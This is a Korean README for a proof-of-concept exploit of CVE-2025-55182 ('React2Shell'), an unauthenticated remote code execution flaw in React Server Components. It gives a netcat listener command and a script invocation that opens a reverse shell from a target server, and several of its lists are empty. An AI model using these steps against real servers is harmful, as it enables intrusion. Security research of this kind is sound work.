
CVE-2025-55182 (React2Shell)에 대한 개념 증명 익스플로잇으로, 제작된 Flight 프로토콜 페이로드를 통해 React Server Components에서 발생하는 인증되지 않은 원격 코드 실행 취약점입니다.
CVE-2025-55182, 일명 React2Shell은 React Server Components 패키지(버전 19.0, 19.1.0, 19.1.1, 19.2.0)에 영향을 미치는 심각한 인증되지 않은 원격 코드 실행(RCE) 취약점입니다.
이 취약점으로 인해 공격자는 인증 없이 단일 조작된 HTTP 요청을 통해 취약한 서버에서 임의 코드 실행을 달성할 수 있습니다.
React Server Components는 클라이언트와 서버 간에 교환되는 컴포넌트 데이터를 직렬화 및 역직렬화하기 위해 Flight 프로토콜을 사용합니다.
이 역직렬화 과정에서의 부적절한 검증으로 인해 특수하게 조작된 페이로드가 내부 객체 구조를 조작하고 위험한 JavaScript 실행 기본 요소에 도달할 수 있습니다.
취약점은 React Server Components(RSC) Flight 프로토콜 페이로드의 역직렬화 중 충분하지 않은 검증에서 비롯됩니다.
특수하게 조작된 페이로드는 다음을 수행할 수 있습니다:
multipart/form-data 요청을 보냅니다.자신의 머신에서 리스너를 시작하세요:
nc -lvnp 4444
익스플로잇 실행:
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100
이 취약점을 완화하려면:
이 프로젝트는 다음 목적으로만 엄격히 제공됩니다:
저자는 본 자료의 오용이나 이로 인한 손해에 대해 책임을 지지 않습니다. 사용자는 관련 법률 및 규정을 준수할 전적인 책임이 있습니다.